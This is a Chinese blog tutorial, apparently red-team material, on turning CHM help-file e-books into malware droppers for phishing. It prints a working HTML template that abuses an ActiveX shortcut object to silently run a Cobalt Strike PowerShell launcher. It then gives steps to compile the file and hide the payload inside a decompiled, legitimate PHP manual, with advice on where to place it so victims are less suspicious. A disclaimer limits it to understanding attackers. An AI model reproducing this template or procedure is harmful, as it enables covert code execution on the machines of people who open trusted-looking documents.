[红队apt]CHM电子书攻击/电子教程攻击

免责声明: 本文用于了解攻击者的攻击手法,切勿用于不法用途


前言

欢迎来到我的博客

个人主页:北岭敲键盘的荒漠猫-CSDN博客

本文主要整理当初电子书的时代,利用电子书攻击的操作

CHM电子书简介

这个在当初普遍用于做教程课件,软件说明等应用。

现在这个用的少了,但是依旧还是有些使用用途。

下面是php的chm教程

这个用来钓鱼还是不错的。

但是一般咱得找点模版,在人家基础上进行编辑。

不然莫名其妙一个奇怪chm太容易被怀疑了。

这个东西其实就是跟网页一样,用h5做的。

制作基础CHM木马

上线模板如下

html 复制代码
<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",填入生成的PS上线命令">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

CS生成web投递指令

填好内容

点运行

复制下面的指令

然后去掉这个命令中的双引号,并且在exe后面加个,

之后复制到模板的指定位置

然后用easy chm去制作chm电子书

创建一个项目,把这个html文件添加进去

完成之后点编译

生成木马,chm文件在对应目录的上一个目录

但是这样打开一个啥也没有的chm确实很可疑。

所以我们往往会选择一个正统的chm文本做嵌入。

高级版CHM木马

找一个真正有用的chm文件

这次我们使用这个php文档作为嵌入

这个是成品,我们需要先给他反编译过来。

反编译掉他

插入攻击代码,保存一下。

然后打开即可。

尽量在首页插入,不然他不浏览可能不会中招。

当然从社工角度也可以往后面插,因为一打开提示安全问题也比较怀疑。

相关推荐
zskj_zhyl2 小时前
毫米波雷达守护银发安全:七彩喜跌倒检测仪重构居家养老防线
人工智能·安全·重构
古希腊数通小白(ip在学)3 小时前
stp拓扑变化分类
运维·服务器·网络·智能路由器
qq_312920117 小时前
开源入侵防御系统——CrowdSec
安全·开源
饶了我吧,放了我吧8 小时前
计算机网络实验——无线局域网安全实验
计算机网络·安全·web安全
TracyCoder1239 小时前
Apache Shiro 框架详解
安全·apache·shiro·认证·登录
字节跳动安全中心11 小时前
当AI智能体学会“欺骗”,我们如何自保?来自火山的MCP安全答卷
安全·llm·mcp
hrrrrb11 小时前
【TCP/IP】11. IP 组播
服务器·网络·tcp/ip
muyun280011 小时前
安全访问云端内部应用:用frp的stcp功能解决SSH转发的痛点
运维·安全·ssh·frp
甘露寺11 小时前
HTTP 请求体类型详解:选择最适合的数据提交格式
网络·网络协议·http
七仔あ11 小时前
小皮面板搭建pikachu靶场
网络·渗透